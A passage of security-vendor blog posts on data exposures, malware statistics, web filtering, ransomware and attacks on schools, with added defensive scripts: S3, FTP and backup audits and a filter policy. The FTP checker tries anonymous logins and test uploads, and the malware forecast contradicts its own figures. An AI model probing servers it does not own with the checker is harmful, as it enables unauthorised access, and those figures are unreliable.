While every individual is responsible for being aware of the risks when venturing online and for taking steps to protect their identities and bank accounts, the survey confirms what many IT security professionals know all too well: employee cybersecurity awareness is poor, and the risk of employees making mistakes that compromise the security of their organization is high.
Cybersecurity training programs clearly need to be improved to raise awareness of the main threats and drill in best practices. However, it is essential that robust defenses are implemented to ensure that business networks are protected from poor security decisions made by employees.
If you would like to find out more about the best cybersecurity solutions that you can implement to keep your business protected from your own employees and how you can reduce reliance on your staff making the right security choices, contact the TitanHQ team today.
Security researcher Chris Vickery has discovered a Schoolzilla AWS misconfiguration that resulted in the records of 1.3 million students being accidentally left unprotected.
Schoolzilla is a student warehouse platform used by K12 schools to track and analyze student data. While data on the platform were protected and access by unauthorized individuals was not possible, that was not the case for a backup file on the platform.
Vickery had been conducting scans to identify unprotected Amazon Web Services installations when he noticed a number of unsecured buckets on the Tableau data visualization platform. Further investigation revealed an unprotected ‘sz tableau’ bucket named sz-backups, which was a data repository for backups of the Schoolzilla database.
The Amazon S3 bucket had been accidentally configured to allow public access, leaving 1.3 million student records exposed. The records contained sensitive information such as the names and addresses of students, along with test scores, grades, birthdates and some Social Security numbers.
Vickery notified Schoolzilla of the error and the company worked quickly to secure the backups. Schoolzilla has now implemented a number of additional technical safeguards to ensure all student data is protected and all affected schools have been contacted and notified of the data exposure. It is unclear exactly how many schools were affected.
The Schoolzilla AWS misconfiguration shows just how easy it is for sensitive data to be exposed online. This time it was a security researcher that discovered the exposed data, but cybercriminals are also performing scans for unprotected data. In this case, Schoolzilla was able to confirm that no unauthorized individuals had accessed the file except Vickery. Other companies may not be so fortunate.
Schools and other educational institutions are increasingly using AWS and other cloud storage platforms to house student data. Data can be securely stored in the cloud; however, human error can all too easily result in sensitive data being exposed.
The incident highlights just how important it is for organizations to conduct security scans and perform penetration tests to ensure that vulnerabilities and errors are rapidly discovered and corrected.
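One such scan is an inventory of bucket permissions. As an added example that is not Schoolzilla’s, Tableau’s or AWS’s code, the following PowerShell lists every S3 bucket in an account together with any ACL grant or bucket policy that makes it public, the kind of exposure behind the incident above; it assumes the AWS.Tools.S3 module and read-only credentials for the four S3 calls it makes.

```powershell
# Added example, not from the original article. Requires the AWS.Tools.S3 module
# and credentials allowed s3:ListAllMyBuckets, s3:GetBucketAcl,
# s3:GetBucketPolicyStatus and s3:GetBucketPublicAccessBlock.

$PublicGranteeUris = @(
    'http://acs.amazonaws.com/groups/global/AllUsers',          # anyone on the Internet
    'http://acs.amazonaws.com/groups/global/AuthenticatedUsers' # any AWS account at all
)

function Get-PublicAclGrants {
    # Pure function over an ACL's grant list: returns "<group>:<permission>" for
    # every grant to a public group, so the logic can be checked without AWS.
    param($Grants)
    @($Grants | Where-Object { $_.Grantee.URI -in $PublicGranteeUris } |
        ForEach-Object { '{0}:{1}' -f $_.Grantee.URI.Split('/')[-1], $_.Permission })
}

function Get-S3PublicExposure {
    foreach ($bucket in Get-S3Bucket) {
        $name   = $bucket.BucketName
        $grants = Get-PublicAclGrants (Get-S3ACL -BucketName $name).Grants

        # A bucket policy can open the bucket even when the ACL is private
        $policyPublic = $false
        try { $policyPublic = [bool](Get-S3BucketPolicyStatus -BucketName $name).IsPublic }
        catch { }   # no bucket policy => nothing granted by policy

        # Block Public Access (added by AWS after this incident): when public ACLs
        # are ignored, an accidental AllUsers grant like the one above does no harm
        $ignoreAcls = $false
        try { $ignoreAcls = [bool](Get-S3PublicAccessBlock -BucketName $name).IgnorePublicAcls }
        catch { }   # not configured for this bucket

        [pscustomobject]@{
            Bucket           = $name
            PublicAclGrants  = ($grants -join ', ')
            PolicyIsPublic   = $policyPublic
            IgnorePublicAcls = $ignoreAcls
            Exposed          = (($grants.Count -gt 0 -and -not $ignoreAcls) -or $policyPublic)
        }
    }
}

# Usage:
#   Get-S3PublicExposure | Where-Object Exposed | Format-Table -AutoSize
```

Object-level ACLs can differ from the bucket ACL, so a bucket reported as not exposed can still hold individually public objects; the same grant check can be run over Get-S3ACL with a -Key for objects that matter, such as database backups.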
The Human Trafficking and Child Exploitation Prevention Act is a bill that will make it harder for individuals to access pornography on Internet-enabled devices by making manufacturers and retailers of those devices implement a pornography filtering solution by default.
Support for the bill is growing, with 12 states having already backed the bill – Alabama, Florida, Georgia, Indiana, Louisiana, New Jersey, North Dakota, Oklahoma, South Carolina, Texas, West Virginia, and Wyoming – and many others are considering implementing similar legislation.
While many states have been opposed to introducing legislation that prevents pornography from being accessed, support for the bill has been growing due to the change in how pornography is being portrayed. Rather than being viewed as a moral issue that must be tackled, pornography is now being viewed as a public health crisis. Proponents of the Human Trafficking and Child Exploitation Prevention Act claim viewing pornography is bad for mental health, sexual health, as well as causing damage to relationships. It has been claimed that the availability of pornography is also contributing to the growth of human trafficking for the sex trade.
The legislation requires all manufacturers and retailers who make or sell Internet-enabled devices to be required by law to implement a web filtering solution on those devices to block pornography, prostitution hubs, child pornography, obscenity, and revenge pornography on those devices by default.
The law will not make it illegal for individuals over the age of 18 to view Internet pornography and other obscene content, but in order to do so they will be required to provide the retailer – or manufacturer – with proof of age. Similar laws are already in place requiring retail stores to prevent minors from being able to view pornographic magazines unless they first provide proof of age.
The legislation is the most workable solution to restrict access to pornography. It would not be feasible to require websites to conduct age checks, as there would be no jurisdiction over website owners based outside the United States. Pornography filtering legislation is viewed as the least restrictive method of controlling who can access pornography.
The Human Trafficking and Child Exploitation Prevention Act will not prohibit individuals from viewing pornography if they wish to do so. However, exercising their right to access obscene content will come at a cost. In addition to providing proof of age, consumers will be required to pay a one off fee of $20 to have the pornography filter lifted. The money collected will go to the state in which the individual resides, and those funds will be directed to a number of groups that are tackling the problem of human trafficking and sexual violence.
Individuals may have to pay further costs to access pornography as retailers and manufacturers will be permitted to charge individuals a fee on top of the $20 state fee for unlocking the pornography filter.
It is possible that the filtering solution used by manufacturers and retailers may not get the balance right 100% of the time. There are likely to be many cases of over-blocking or under-blocking of obscene content. Therefore, the Human Trafficking and Child Exploitation Prevention Act requires a mechanism to be put in place that allows individuals to submit requests to have websites and webpages added to the filter if they contain obscene content and have not been blocked. Similarly, if websites containing acceptable content are incorrectly blocked by the filter, it must be possible for individuals to request that the block be lifted. A call center or website must be made available for this purpose.
Manufacturers/retailers will be required to process requests in a reasonable timeframe. If they fail to do so they will be liable for fines.
McAfee has issued a new threat report detailing 2016 malware trends. The decline in new malware samples in the final quarter of 2016 does not suggest that 2017 will see a continued fall in new malware, but the opposite, according to McAfee Labs.
2016 malware trends follow a similar pattern to 2015. The first quarter saw large volumes of new malware discovered, followed by a steady decline over the next three quarters. The same trend was identified in 2015. Far from that decline continuing into 2017, the first quarter figures – which will not be made available until the summer – are likely to follow a similar trend and involve a massive increase in malware numbers in the first three months of 2017.
Further, there has been a steady increase in the number of new malware samples detected year on year, from around 400 million per quarter in 2015 to more than 600 million per quarter in 2016. If that trend continues into 2017, this year is likely to see around 800,000 new malware samples detected each quarter on average. McAfee predicts that there will be around 17 million malware samples by the end of this year.
McAfee reports that ransomware has increased steadily over the course of 2016, starting the year with around 6 million samples and finishing the year with over 9 million detected samples. However, the final quarter of 2016 saw a sharp drop in ransomware due to a decline in generic ransomware detections and a fall in the use of Locky.
There have been relatively few new Mac OS malware samples detected over the past two years, although Q3, 2016 saw new Mac OS malware increase from around 10,000 to 50,000, with a massive rise to around 320,000 new samples in the final quarter of 2016.
By the end of 2016, the total number of Mac OS malware rose to more than 450,000, from around 50,000 at the end of Q4, 2015. The increase mostly involved bundled adware.
The switch from exploit kits to email as the main attack vector is evident from the figures for new macro malware, with a sharp rise in Q2, 2016 and a continued rise in Q3. In Q1, there were around 60,000 detections, in Q3 that figure had risen to more than 200,000.
The public sector was most affected by security breaches in 2016, followed by healthcare, online services, finance, and software development. The biggest causes of security incidents, for which the causes are known, were account hijacking, followed by DDoS attacks, targeted attacks, SQL injection and malware. The main methods used for conducting network attacks last year were SSL (33%), DoS (15%), Worms (13%), brute force attacks (13%), and browser-based attacks (15%).
There has been a downward trend in new suspect URLs detected from Q1, 2015 to Q2, 2016, although that trend reversed in the last two quarters of 2016, with new malicious URL detections starting to rise steadily. New phishing URLs ebb and flow, although there was a general upward trend in 2016. McAfee’s figures show spam email volume has remained fairly constant for the past two years, with the bulk of spam messages delivered using the Necurs botnet in Q3 and Q4, 2016.
A recent insider threat intelligence report from Dtex has revealed the vast majority of firms have employees bypassing security controls put in place to limit Internet activity. Those controls may simply be policies that prohibit employees from accessing certain websites during working hours, or in some cases, Internet filtering controls such as web filtering solutions.
Dtex discovered during its risk assessments on organizations that 95% of companies had employees that were using virtual private networks (VPNs) to access the Internet anonymously, with many installing the TOR browser or researching ways to bypass security controls online. The researchers discovered that in some cases, employees were going as far as installing vulnerability testing tools to bypass security controls.
Why Are Employees Bypassing Security Controls?
Employees bypassing security controls is a major problem, but why is it happening?
The report indicates 60% of attacks involve insiders, with 22% of those attacks malicious in nature. During the first week of employment and the final week before an employee leaves, there is the greatest chance of data theft. 56% of organizations said they had discovered potential data theft during those two weeks. During these times there is the greatest risk of employees attempting to bypass security controls for malicious reasons.
In many cases, VPNs and anonymizers are used to allow employees to access websites without being tracked. Many companies have policies in place that prohibit employees from accessing pornography in the workplace. Similar policies may cover gaming and gambling websites and other categories of website that serve no work purpose. Some employees choose to ignore those rules and use anonymizers to prevent their organization from having any visibility into their online activities.
The report indicates 59% of organizations had discovered employees were accessing pornographic websites at work. There are many reasons why companies prohibit the accessing of pornography at work. It is a drain on productivity, it can lead to the development of a hostile working environment, and from a security standpoint, it is a high-risk activity. Pornographic websites are often targeted by cybercriminals and used to host malware. Visiting those sites increases the risk of silent malware downloads. 43% of companies said they had found out some employees had been using gambling sites at work, another high-risk category of website and a major drain on productivity.
While employees are provided with email accounts, many are choosing to access web-based accounts such as Gmail. Dtex found that 87% of employees were using web-based email programs on work computers. Not only does this present a security risk by increasing the probability of malware being downloaded, it makes it harder for employers to identify data theft. Dtex says “By completely removing data and activity from the control of corporate security teams, insiders are giving attackers direct access to corporate assets.”
Lack of Control and Visibility
Many companies are unaware that employees are bypassing security controls because they lack visibility into what is happening on endpoints. Shadow IT, including VPNs and hacking tools, can be installed without the organization’s knowledge. So what can be done to stop employees bypassing security controls?
Endpoint monitoring software can be installed so that organizations can see what activities are taking place on work computers and act on them to reduce insider threats. Organizations should also block the use of VPNs and anonymizers so that they retain visibility into employees’ online activity.
One of the easiest ways to block the use of VPNs and anonymizers is to use a web filtering solution. Web filters are increasingly used as a way of preventing productivity losses during the working day. Web filtering solutions can be configured to block specific sites or categories of website.
A web filter, such as WebTitan, can be configured to block access to anonymizer websites, along with other websites that are prohibited under the organization’s acceptable use policies.
Some employees find the controls overly restrictive and search for ways to bypass those controls. Organizations should carefully consider what websites and types of websites are blocked. Excessively restrictive controls over personal Internet access can prompt employees to try to bypass security controls. Allowing some personal use may be preferable.
One option, possible with WebTitan, is to ease restrictions on Internet access using time controls. To protect productivity, the stricter filtering can be applied during working hours and relaxed at other times such as lunch breaks. Allowing some personal Internet use removes much of the incentive for employees to try to bypass security controls. Time-based relaxation should apply only to productivity categories; anonymizers, VPNs and malicious-site categories should stay blocked at all times, because the visibility they remove, not the time spent on them, is the security problem.
WebTitan also produces access logs to allow organizations to carefully monitor online user activity and take action against the individuals discovered to be violating company policies. Automatic reports can also be generated to allow organizations to take more timely action.
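As an added example (this is not WebTitan’s policy engine or configuration format, neither of which is shown on this page), the following Python script evaluates a time-aware category policy of the kind described above against constructed proxy log lines: productivity categories are relaxed outside working hours, anonymizer and VPN categories are blocked at all times, and requests for always-blocked categories are counted per user as the bypass attempts worth following up. The categories, hostnames, working-hour windows and log lines are assumptions made for the example.

```python
"""Time-aware web filtering policy evaluated against proxy log lines.

Added example: this is not WebTitan's policy engine or configuration format; the
categories, hostnames, working-hour windows and log lines are constructed for the illustration.
"""
from collections import Counter
from datetime import datetime, time

# Categories that remove visibility or are outright dangerous stay blocked around the clock.
ALWAYS_BLOCKED = {"anonymizer", "vpn", "malware", "phishing", "pornography", "gambling", "webmail"}
# Productivity categories are blocked only inside working hours and relaxed at lunch/after hours.
WORK_HOURS_ONLY = {"social-media", "streaming", "shopping"}
# Working-hour windows (assumed): 09:00-12:30 and 13:30-17:30, Monday to Friday.
WORK_WINDOWS = [(time(9, 0), time(12, 30)), (time(13, 30), time(17, 30))]

# Stand-in for a URL categorisation feed; a real filter looks these up from its vendor database.
HOST_CATEGORIES = {
    "hidemyip.example": "anonymizer",
    "vpn-gateway.example": "vpn",
    "social.example": "social-media",
    "video.example": "streaming",
    "mail.example": "webmail",
    "intranet.corp.example": "business",
}


def in_working_hours(ts: datetime) -> bool:
    """True inside a working-hour window on a weekday."""
    if ts.weekday() >= 5:  # Saturday/Sunday
        return False
    t = ts.time()
    return any(start <= t < end for start, end in WORK_WINDOWS)


def decide(category: str, ts: datetime) -> str:
    """Return 'block' or 'allow' for a request category at time ts."""
    if category in ALWAYS_BLOCKED:
        return "block"  # time controls never relax these
    if category in WORK_HOURS_ONLY and in_working_hours(ts):
        return "block"
    return "allow"


def decide_at(category: str, iso_timestamp: str) -> str:
    """Convenience wrapper taking an ISO 8601 timestamp string."""
    return decide(category, datetime.fromisoformat(iso_timestamp))


def audit_proxy_log(lines):
    """Apply the policy to log lines of the form '<ISO timestamp> <user> <host>'.

    Returns (decisions, bypass_attempts): every decision plus a per-user count of requests
    to always-blocked categories, which is the 'bypass attempt' signal to follow up.
    """
    decisions = []
    bypass_attempts = Counter()
    for line in lines:
        stamp, user, host = line.split()
        ts = datetime.fromisoformat(stamp)
        category = HOST_CATEGORIES.get(host, "uncategorised")
        verdict = decide(category, ts)
        decisions.append((user, host, category, verdict))
        if category in ALWAYS_BLOCKED:
            bypass_attempts[user] += 1
    return decisions, bypass_attempts


# Constructed sample log: a Tuesday (2017-03-14) at various times.
SAMPLE_LOG = [
    "2017-03-14T10:05:00 alice social.example",         # work hours: blocked
    "2017-03-14T12:45:00 alice social.example",         # lunch break: allowed
    "2017-03-14T12:50:00 bob hidemyip.example",         # anonymizer at lunch: still blocked
    "2017-03-14T15:10:00 bob vpn-gateway.example",      # VPN during work: blocked
    "2017-03-14T18:30:00 carol video.example",          # after hours: allowed
    "2017-03-14T11:00:00 carol intranet.corp.example",  # business: allowed
]

if __name__ == "__main__":
    decisions, attempts = audit_proxy_log(SAMPLE_LOG)
    for user, host, cat, verdict in decisions:
        print(f"{user:6} {host:24} {cat:13} {verdict}")
    print("bypass attempts:", dict(attempts))
```

The point of keeping two separate sets is that the time control must never touch the anonymizer and VPN categories: a lunch-hour exception for social media costs nothing, but a lunch-hour exception for a VPN hands the employee an hour a day of traffic the organization cannot see.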
Monitoring employee Internet access and installing solutions to provide visibility into end point activity allows organizations to reduce the risk of insider threats and stop employees from engaging in risky behavior.
Bitdefender has developed a free Bart ransomware decryptor that allows victims to unlock their files without paying a ransom.
Bart ransomware was first detected in June 2016. The variant stood out from the many others because it could encrypt files without an Internet connection. Most ransomware variants rely on contacting their command and control (C&C) server to obtain or register encryption keys before encrypting; Bart does not. Only the recovery process requires an Internet connection, to pay the ransom and receive the decryption key.
That made Bart a particular threat to corporate users. For most ransomware, blocking C&C communications at the firewall can stop encryption from ever starting; since Bart needs no C&C contact to encrypt, that control offered no protection.
Bart ransomware was believed to have been developed by the gang behind Locky and the Dridex banking Trojan. Bart ransomware shared a significant portion of code with Locky, was distributed in the same manner and used a ransom message very similar to that used by Locky.
As with Locky, Bart encrypted a wide range of file types. Early versions were fairly unsophisticated and blocked access to files by placing them in password-protected zip archives; later versions corrected the flaws.
That initial method was ‘cracked’ by AVG, although only by brute-forcing the archive password, and the attack needed a copy of an encrypted file together with its unencrypted original (a known-plaintext attack). Later versions dropped the zip archives, rendering AVG’s technique ineffective. The encryption used in the later versions was much stronger and had no known flaws.
Until Bitdefender developed the latest Bart Ransomware decryptor, victims had two choices – recover encrypted files from backups or pay the attackers’ ransom demand.
Fortunately, Bitdefender was able to create a Bart Ransomware decryptor from keys supplied by Romanian police which were obtained during a criminal investigation. The Bart ransomware decryptor was developed by Bitdefender after collaborating with both the Romanian police and Europol.
Since April 4, 2017, the Bart ransomware decryptor has been available for free download from the No More Ransom website. If your files have been encrypted, the extension added to them tells you whether Bart is the culprit: Bart uses the .bart, .perl, or .bart.zip extensions.
Although Bart is believed to be linked to Locky, there is no indication that keys have been obtained that would allow a Locky ransomware decryptor to be developed. The best defense against attacks remains blocking spam emails to prevent infection and ensuring that backups of all sensitive data have been made.
The FBI has issued a cybersecurity warning for healthcare providers on the use of FTP servers. FTP servers should have authentication controls in place to ensure only authorized individuals can access stored data. However, when FTP servers are in anonymous mode, access can be gained with a generic username and password. In some cases, access is possible without a password.
The usernames that provide access could be as simple as ‘FTP’ or ‘anonymous’ and lists of usernames can be easily found on the Internet. Cycling through a short list of possible usernames is likely to take seconds or minutes at the most and access to stored data can be gained without any hacking skills. Data stored on an anonymous FTP server could be accessed by anyone.
The FBI cybersecurity warning for healthcare providers cites research conducted by the University of Michigan in 2015 that shows the scale of the problem. The study revealed there are more than one million FTP servers in use around the world that allow anonymous access. Any data stored on those servers could be freely accessed by the public. Should those FTP servers contain sensitive data such as protected health information, it could easily be stolen and used for malicious purposes.
Firewalls and other perimeter defenses serve to protect networks and EHRs from cyberattacks, yet FTP servers could be a gaping hole in an organization’s defenses. Many healthcare providers use FTP servers to allow data to be easily shared with business associates and other healthcare entities. Yet, if authentication controls are not used they are a data breach waiting to happen.
The FBI has warned all medical and dental organizations to ensure that no sensitive data are stored on anonymous FTP servers and advises healthcare organizations to check if their servers are running in anonymous mode. Smaller organizations without the resources of large healthcare systems are more likely to have overlooked this vulnerability; although checks should be performed by all healthcare organizations.
The cybersecurity warning for healthcare providers explains the risks extend beyond the theft of sensitive data. If access to the servers can be gained, FTP servers could be used to store illegal material. Healthcare organizations may have cybersecurity solutions in place to monitor for data being exfiltrated, but not data that are being uploaded. Hacking tools could be uploaded to the servers or they could be used to share illegal content.
If FTP servers must be run in anonymous mode, healthcare organizations should ensure the servers contain only data that is already public, and that anonymous users have read-only access so the server cannot be used as a drop site for uploaded content.
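The check the FBI is asking for can be scripted. The following Python is an added example, not a tool from the FBI notice or the University of Michigan study, using only the standard library’s ftplib: it tries the usual anonymous usernames, records what an anonymous user can list, and optionally tests whether an anonymous user can upload (the drop-site risk described above). Run it only against servers you own. The usernames tried, the canary filename and the offline fake server it demonstrates against are assumptions made for the example.

```python
"""Audit FTP servers for anonymous access.

Added example: this is not a tool from the FBI notice or the University of Michigan study.
The usernames tried, the canary filename and the offline fake server are assumptions made
for the illustration; point audit_ftp_host() at your own servers only.
"""
import ftplib
import io
from dataclasses import dataclass, field
from typing import List, Optional

ANON_USERS = ("anonymous", "ftp")    # usernames servers in anonymous mode typically accept
ANON_PASSWORD = "audit@example.com"  # convention: any e-mail address as the password
CANARY = "ftp-audit-canary.txt"      # zero-byte file used for the optional write test


@dataclass
class FtpAuditResult:
    host: str
    anonymous_login: bool = False
    username: Optional[str] = None
    listing: List[str] = field(default_factory=list)
    writable: Optional[bool] = None  # None means the write test was not run
    error: Optional[str] = None


def _can_upload(ftp) -> bool:
    """Try to store and then delete a zero-byte canary. Only run against servers you own."""
    try:
        ftp.storbinary(f"STOR {CANARY}", io.BytesIO(b""))
    except ftplib.error_perm:
        return False
    try:
        ftp.delete(CANARY)
    except ftplib.error_perm:
        pass  # upload worked but delete did not; remove the canary by hand
    return True


def audit_ftp_host(host, port=21, timeout=5.0, test_write=False, ftp_factory=ftplib.FTP):
    """Try the anonymous usernames; on success record the root listing and optionally test writes."""
    result = FtpAuditResult(host=host)
    for user in ANON_USERS:
        ftp = ftp_factory()
        try:
            ftp.connect(host, port, timeout=timeout)
            ftp.login(user, ANON_PASSWORD)
        except ftplib.error_perm:  # 530 Login incorrect: try the next username
            ftp.close()
            continue
        except (OSError, ftplib.Error) as exc:  # unreachable host, timeout, protocol error
            result.error = f"{type(exc).__name__}: {exc}"
            return result
        result.anonymous_login = True
        result.username = user
        try:
            result.listing = ftp.nlst()
        except ftplib.error_perm:
            result.listing = []  # logged in but listing denied
        if test_write:
            result.writable = _can_upload(ftp)
        ftp.quit()
        break
    return result


class _FakeAnonymousFtp:
    """Constructed stand-in for ftplib.FTP so the example runs offline.

    It models a misconfigured server: 'anonymous' logs in, sees a sensitive export, and can upload.
    """
    def __init__(self):
        self.files = ["patients_export.csv", "readme.txt"]

    def connect(self, host, port=21, timeout=None):
        return "220 fake server ready"

    def login(self, user="", passwd="", acct=""):
        if user != "anonymous":
            raise ftplib.error_perm("530 Login incorrect.")
        return "230 Anonymous access granted"

    def nlst(self, *args):
        return list(self.files)

    def storbinary(self, cmd, fp, blocksize=8192, callback=None, rest=None):
        self.files.append(cmd.split(" ", 1)[1])
        return "226 Transfer complete"

    def delete(self, filename):
        self.files.remove(filename)
        return "250 Deleted"

    def quit(self):
        return "221 Goodbye"

    def close(self):
        pass


def demo_offline() -> FtpAuditResult:
    """Run the audit against the constructed fake server."""
    return audit_ftp_host("ftp.example.internal", test_write=True, ftp_factory=_FakeAnonymousFtp)


if __name__ == "__main__":
    r = demo_offline()
    print(f"{r.host}: anonymous={r.anonymous_login} user={r.username} writable={r.writable}")
    print("listing:", r.listing)
```

`audit_ftp_host("ftp.yourhost.example")` probes a real server; `test_write=True` leaves the canary behind if the server allows STOR but not DELE, so schedule the write test with that in mind. A listing that shows anything but public material, or `writable=True`, is the finding to escalate.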
Educational institutions have been warned about Moodle security flaws that could allow cybercriminals to attack web servers, gain administrative privileges and run malicious code.
Many educational institutions use the Moodle platform for their e-learning websites. The platform allows students to access interactive online courses. There are almost 80,000 websites that use the open source platform, many of which are operated by schools, colleges and universities.
On Monday this week, security researcher Netanel Rubin disclosed a vulnerability – tracked as CVE-2017-2641 – that could be exploited to run malicious PHP code on an unpatched Moodle server. He pointed out on his blog that the problem does not lie with a single critical security flaw but with a number of smaller vulnerabilities that can be exploited when combined.
An attacker could exploit the Moodle security flaws and create hidden administrative accounts; however, in order to exploit the flaws, it would be necessary for the attacker to have an account on the platform. It does not matter what type of account the attacker has, provided it is not a guest account. Since more than 100 million individuals log onto the websites to access courses, obtaining a user account would not pose too much of a problem.
The Moodle security flaws could be exploited by attackers to install backdoors in the system allowing persistent access to data stored on a Moodle server, and there is data aplenty. Highly sensitive information about students is stored on the system, including personal information, grades and test data.
According to Rubin, the Moodle security flaws affect all versions of the platform tested, including “3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions.”
Rubin pointed out that such a large system – Moodle contains more than 2 million lines of PHP code – will almost inevitably have numerous vulnerabilities. In this case, the code has been written by multiple authors which has led to logical flaws being introduced. The problem comes from having too much code, too many developers and a lack of documentation. That is a problem for any system of this size, not just Moodle.
Rubin was able to take advantage of the Moodle security flaws and gain administrative privileges on the server, after which it was child’s play to execute code. Rubin said it was as simple as uploading a new plugin to the server.
Last week Moodle released a patch to address a number of vulnerabilities in the system, although no information was released about what the patch addressed. All users of the system are advised to update to the latest version of the platform and apply the latest security patch as soon as possible.
Failure to update systems and apply patches promptly will leave systems vulnerable to attack, whether it is Moodle or any other platform or software. If patches are not applied it will only be a matter of time before security flaws are exploited to gain access to servers or computers and steal sensitive data.
2017 has started particularly badly for the education sector, with numerous cyberattacks on educational institutions already reported and no sign of them abating any time soon. But why is the education sector being so heavily targeted by hackers, cybercriminals, and scammers?
It is easy to see why cyberattacks on financial institutions occur. There are substantial funds to be plundered. Cyberattacks on healthcare organizations are also common. Those organizations hold vast quantities of data; data that can be sold for big bucks on the black market and used for all manner of fraud: Medical fraud, identity theft, tax fraud, and insurance fraud for example.
However, the education sector is similarly being targeted. K12 schools, colleges, and universities have all been attacked and those attacks have soared in 2017.
The list of educational institutions that have reported cyberattacks in 2017 is long. Barely a day goes by without another educational institution being added to the list. Many of the cyberattacks on educational institutions are random, but it is becoming increasingly clear that the education sector is being targeted.
There are many reasons why the attacks have soared in recent months. Educational institutions hold vast quantities of valuable data, they have considerable computer resources that can be used by cybercriminals, and in contrast to other industry sectors, educational institutions are not as heavily regulated when it comes to cybersecurity protections. Defenses are relatively poor and educational organizations tend to have relatively few IT staff compared to the corporate sector.
In short, the potential profits from cyberattacks on educational institutions are high and attacks are relatively easy to perform. For cybercriminals that is an excellent combination.
What Data are Cybercriminals Attempting to Steal?
K12 school systems have been targeted by criminals in order to gain access to student data. Dates of birth and Social Security numbers can be used for identity theft and fraud, and the Social Security numbers of minors are especially valuable: fraud against a minor is less likely to be identified quickly, since minors rarely have credit files that anyone is monitoring, so their details can be used for longer.
Universities and school systems also hold considerable amounts of intellectual property and research. That information can be sold for considerable sums on the black market.
As we have seen on many occasions this year, the personal information of school employees has been targeted by scammers. Emails have been sent requesting W-2 Form data, which are used to file fraudulent tax returns in school employees’ names.
This tax season, the following colleges, universities, schools and school districts have reported that employees have fallen for a W-2 Form phishing scam and have emailed the data of their employees to cybercriminals.
- Abernathy Independent School District
- Ark City School District
- Ashland University
- Barron Area School District
- Belton Independent School District
- Black River Falls School District
- Bloomington Public Schools
- College of Southern Idaho
- Corsicana Independent School District
- Crotched Mountain Foundation
- Davidson County Schools
- Dracut Schools
- Glastonbury Public Schools
- Groton Public Schools
- Independent School District
- Lexington School District Two
- Manatee County School District
- Mohave Community College
- Morton School District
- Mount Healthy City Schools
- Northwestern College
- Odessa School District
- Redmond School District
- Tipton County Schools
- Trenton R-9 School District
- Tyler Independent School District
- Virginia Wesleyan College
- Yukon Public Schools
As with the healthcare industry, the reliance on data makes schools, colleges, and universities targets for ransomware attacks. Ransomware is used to encrypt data and a ransomware demand is issued to unlock files. In many cases ransoms are paid as no backups of the encrypted data exist.
Some notable cyberattacks on educational institutions that have been reported this year are listed below.
2017 Cyberattacks on Educational Institutions
Northside Independent School District in San Antonio, TX, discovered its email system had been hacked. Names, addresses, and dates of birth were potentially stolen. In total, 23,000 individuals were impacted by the incident.
South Washington County Schools in Minnesota discovered that one of its students had hacked into its system and stolen more than 15,000 employee records.
Los Angeles Valley College was attacked with ransomware in January and paid a ransom of $28,000 to regain access to its files. The attack encrypted most of the college’s infrastructure, including email and voicemail.
Horry County Schools in South Carolina was forced to pay a ransom demand of $8,500 to recover data that were encrypted with ransomware. Even though the ransom was paid, systems were taken out of action for over a week as a result of the infection.
These are just a handful of the cyberattacks on educational institutions reported this year. Given the increase in cyberattacks on educational institutions, it is essential that schools, colleges, and universities take action and implement appropriate defences to mitigate risk.
If you are in charge of cybersecurity at your educational organization and you would like to receive tailored advice on some of the best protection measures you can implement to reduce the risk of a cyberattack, contact the TitanHQ team today.
At a recent cybersecurity conference, FBI Director James B. Comey gave valuable ransomware advice for healthcare providers to help them tackle the growing threat of attack. Comey confirmed that ransomware is now the biggest cybersecurity threat for the healthcare industry. Healthcare providers must be prepared for an attack and be able to respond quickly to limit the harm caused.
Ransomware is used to encrypt files and databases to prevent the victim from accessing essential data. Since healthcare providers need access to patient health information in order to provide medical services, healthcare providers are being extensively targeted. If data access is essential, victims are more likely to pay ransom demands.
However, Comey explained that ransoms should never be paid. If a ransom is paid, this only encourages cybercriminals to attack more businesses. The payment of a ransom sends a message to other cybercriminals that the attacks are profitable.
Ransomware can be sent randomly via spam email or distributed by malicious websites. Cybercriminals also install ransomware once access to a computer system has been gained and data have been exfiltrated. Tackling the problem involves implementing a range of cybersecurity defenses to prevent attacks and ensuring data can be recovered and business processes can continue if ransomware is installed.
In the case of the latter, data backups are essential. All critical data should be backed up on a daily basis at a minimum. Data backups can also be encrypted by ransomware, so it is essential that backup devices are not left connected to computers or servers. Data should ideally also be backed up in the cloud.
One of the best pieces of ransomware advice for healthcare providers is to prepare for an attack now. Healthcare organizations should not wait until a ransomware infection occurs to decide how to respond. Not only should policies be developed that can be implemented immediately following a ransomware attack, business continuity plans must be tested prior to a disaster occurring. The same goes for backups. Many organizations have been attacked with ransomware only to discover that they have been unable to restore their data due to a corrupted backup file.
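One concrete way to test backups before a disaster, as an added example rather than guidance from the conference: hash every file in the backup set into a manifest at backup time and re-verify the set on a schedule and before any restore. The Python below does that with the standard library and, against a constructed backup directory, shows the three signals that matter: a clean set, a file corrupted in place, and the missing/unexpected pair that a ransomware rename produces. The directory layout, file names and contents are constructed for the example.

```python
"""Write and verify a SHA-256 manifest for a backup set, and show what a ransomware hit looks like.

Added example: this is not guidance or tooling from the FBI or the conference; the directory
layout and file contents are constructed for the illustration.
"""
import hashlib
import json
import shutil
import tempfile
from pathlib import Path

MANIFEST_NAME = "MANIFEST.sha256.json"


def sha256_file(path: Path, chunk: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large backup images do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def _files_under(root: Path):
    """Map relative POSIX path -> Path for every file in the set, excluding the manifest itself."""
    return {p.relative_to(root).as_posix(): p
            for p in root.rglob("*") if p.is_file() and p.name != MANIFEST_NAME}


def write_manifest(backup_dir) -> dict:
    """Record size and SHA-256 of every file; keep a copy of the manifest off the backup volume too."""
    root = Path(backup_dir)
    entries = {rel: {"sha256": sha256_file(p), "size": p.stat().st_size}
               for rel, p in sorted(_files_under(root).items())}
    (root / MANIFEST_NAME).write_text(json.dumps(entries, indent=2, sort_keys=True))
    return entries


def verify_backup(backup_dir, manifest_path=None) -> list:
    """Return a list of problems; an empty list means the set matches the manifest exactly."""
    root = Path(backup_dir)
    manifest = Path(manifest_path) if manifest_path else root / MANIFEST_NAME
    expected = json.loads(manifest.read_text())
    present = _files_under(root)
    problems = []
    for rel, meta in sorted(expected.items()):
        p = present.get(rel)
        if p is None:
            problems.append(f"missing: {rel}")
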